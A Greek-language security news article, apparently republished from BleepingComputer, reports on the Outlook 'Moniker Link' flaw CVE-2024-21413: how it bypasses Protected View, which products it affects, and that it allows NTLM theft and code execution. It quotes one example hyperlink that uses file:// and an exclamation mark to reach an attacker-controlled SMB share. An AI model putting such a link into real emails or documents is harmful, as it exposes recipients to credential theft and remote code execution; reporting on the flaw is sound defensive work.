Η Microsoft αναφέρει ότι απομακρυσμένοι μη πιστοποιημένοι επιτιθέμενοι μπορούν εύκολα να εκμεταλλευτούν μια κρίσιμη ευπάθεια ασφαλείας Moniker Link RCE στο Outlook, η οποία τους επιτρέπει επίσης να παρακάμψουν την προστατευμένη προβολή του Office.
Δείτε επίσης: Το κλασικό Outlook app ενδέχεται να καταργηθεί τα επόμενα δύο χρόνια
Ανακαλύφθηκε από τον ερευνητή ευπαθειών της Check Point, Haifei Li, και είναι γνωστό ως CVE-2024-21413. Το σφάλμα Moniker Link οδηγεί στην εκτέλεση απομακρυσμένου κώδικα (RCE) κατά το άνοιγμα ηλεκτρονικών μηνυμάτων με κακόβουλους συνδέσμους, χρησιμοποιώντας μια ευπαθή έκδοση του Microsoft Outlook.
Αυτό συμβαίνει επειδή η αδυναμία επιτρέπει επίσης στους επιτιθέμενους να παρακάμψουν την Προστατευμένη Προβολή (σχεδιασμένη για να αποκλείει επιβλαβές περιεχόμενο που ενσωματώνεται σε αρχεία Office ανοίγοντάς τα σε λειτουργία μόνο για ανάγνωση) και να ανοίγουν κακόβουλα αρχεία Office σε λειτουργία επεξεργασίας.
Ghost: Εξάρθρωση της πλατφόρμας κρυπτογραφημένων επικοινωνιών
Η εταιρεία προειδοποίησε επίσης ότι η προεπισκόπηση (Preview Pane) αποτελεί ένα διανύσμα επίθεσης για αυτήν την αδυναμία ασφαλείας, επιτρέποντας την εκμετάλλευση ακόμα και κατά την προεπισκόπηση κακόβουλων εγγράφων του Office.
Οι μη εξουσιοδοτημένοι επιτιθέμενοι μπορούν να εκμεταλλευτούν το CVE-2024-21413 απομακρυσμένα σε επιθέσεις χαμηλής πολυπλοκότητας που δεν απαιτούν αλληλεπίδραση με το χρήστη.
Το CVE-2024-21413 επηρεάζει πολλά προϊόντα Office, συμπεριλαμβανομένων του Microsoft Office LTSC 2021 και του Microsoft 365 Apps for Enterprise, καθώς επίσης και του Microsoft Outlook 2016 και του Microsoft Office 2019 (υπό επέκταση υποστήριξης).
Όπως εξηγεί το Check Point σε έκθεσή του που δημοσιεύτηκε σήμερα, η ευπάθεια Moniker Link RCE επιτρέπει σε επιτιθέμενους να παρακάμψουν τις ενσωματωμένες προστασίες του Microsoft Outlook για κακόβουλους συνδέσμους που ενσωματώνονται σε ηλεκτρονικά μηνύματα, χρησιμοποιώντας το πρωτόκολλο file:// και προσθέτοντας ένα θαυμαστικό στις διευθύνσεις URL που δείχνουν σε διακομιστές που ελέγχονται από τον επιτιθέμενο.
Δείτε ακόμα: Outlook prompts: Διορθώνονται για να ανοίξουν τα κλειστά παράθυρα
Το θαυμαστικό προστίθεται αμέσως μετά την επέκταση του εγγράφου, μαζί με κάποιο τυχαίο κείμενο, όπως φαίνεται παρακάτω:
*<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>*
Αυτός ο τύπος hyperlink παρακάμπτει τον περιορισμό ασφαλείας του Outlook, και το Outlook θα έχει πρόσβαση στο απομακρυσμένο πόρο “\\10.10.111.111\test\test.rtf” όταν γίνει κλικ στον σύνδεσμο χωρίς να εκδώσει κάποια προειδοποίηση ή σφάλμα.
Το σφάλμα προέκυψε λόγω της μη ασφαλούς API MkParseDisplayName, επομένως η ευπάθεια μπορεί να επηρεάσει και άλλο λογισμικό που τη χρησιμοποιεί.
Οι επιπτώσεις από επιθέσεις που εκμεταλλεύονται με επιτυχία το CVE-2024-21413 περιλαμβάνουν την κλοπή πληροφοριών NTLM και την εκτέλεση αυθαίρετου κώδικα μέσω κακόβουλα διαμορφωμένων εγγράφων Office.
Η Microsoft ενημέρωσε σήμερα την ανακοίνωση ασφαλείας CVE-2024-21413 για να προειδοποιήσει ότι αυτό το πρόβλημα στο Outlook εκμεταλλεύεται επίσης σε επιθέσεις zero-day πριν από την Patch Tuesday του μήνα αυτού.
Ωστόσο, η εταιρεία επέστρεψε την αλλαγή, αναφέροντας ότι “ανανέωσε λανθασμένα τη σημαία εκμετάλλευσης και την αξιολόγηση εκμεταλλευσιμότητας για να υποδείξει την ύπαρξη εκμετάλλευσης“.
Δείτε επίσης: Microsoft Outlook: Οι ενημερώσεις Δεκεμβρίου προκαλούν ειδοποιήσεις ασφαλείας ICS
Τι είναι το Remote Code Execution flaw;
Το Remote Code Execution (RCE) flaw είναι μια ευπάθεια που επιτρέπει σε έναν επιτιθέμενο να εκτελέσει απομακρυσμένα κώδικα σε ένα σύστημα. Αυτό σημαίνει ότι ο επιτιθέμενος μπορεί να πάρει τον έλεγχο του συστήματος και να το χρησιμοποιήσει για τους δικούς του σκοπούς. Η ευπάθεια RCE μπορεί να προκύψει από διάφορες πηγές, όπως λάθη στον προγραμματισμό, κακή διαχείριση των δεδομένων εισόδου ή ακόμη και από την ανεπαρκή διαχείριση των δικαιωμάτων των χρηστών. Αυτά τα λάθη μπορούν να εκμεταλλευτούν οι επιτιθέμενοι για να εκτελέσουν κώδικα στο σύστημα του θύματος.
Για να αντιμετωπίσετε τις ευπάθειες RCE, είναι σημαντικό να εφαρμόζετε τακτικά ενημερώσεις και διορθώσεις ασφαλείας στο σύστημά σας. Επίσης, η χρήση εργαλείων ανίχνευσης ευπαθειών και η διεξαγωγή τακτικών ελέγχων ασφαλείας μπορεί να βοηθήσει στην ανακάλυψη και την αποτροπή των επιθέσεων RCE. Τέλος, η εκπαίδευση του προσωπικού σας σχετικά με τις καλές πρακτικές ασφαλείας, όπως η αποφυγή κλικ σε ύποπτους συνδέσμους, μπορεί να μειώσει σημαντικά τον κίνδυνο εκμετάλλευσης των ευπαθειών RCE.
Πηγή: bleepingcomputer
